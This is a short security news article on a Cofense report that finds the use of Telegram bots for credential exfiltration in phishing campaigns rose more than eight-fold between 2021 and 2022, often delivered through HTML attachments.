The use of Telegram bots for credential exfiltration increased more than eight-fold between 2021 and 2022, according to new research.
A report released this week by Cofense finds that while Telegram bots being used to exfiltrate information is not new, it has not been commonly used by threat actors in the past for credential phishing. Researchers noted that the significant increase is primarily associated with the current popular tactic of using HTML attachments as delivery mechanisms and the ease of Telegram’s setup.
“During 2022, there has been a gradual increase of evasive campaigns using Telegram bots reaching inboxes. Most of the emails in these campaigns contain an attached HTML file. This HTML file generally has a Telegram bot’s authentication and location hardcoded and obfuscated, or redirects to a domain that hosts a phishing kit with the bot’s ID hardcoded into its resources,” the report read.
The rise of abuse of Telegram bots in 2022 (credit: Cofense)
Telegram bots are like the classic service robots in science fiction movies, but virtual and active on Telegram, Joe Gallop, cyber threat intelligence manager at Cofense explained to SC Media in an interview. Indeed, by the official definition on the Telegram website, these bots can support “any kind of task or service,” with some popular functions including delivering answers to users’ FAQs, converting certain file types into others, or setting reminders for users.
Unfortunately, “any kind of task or service” also attracts threat actors to perform malicious tasks and services.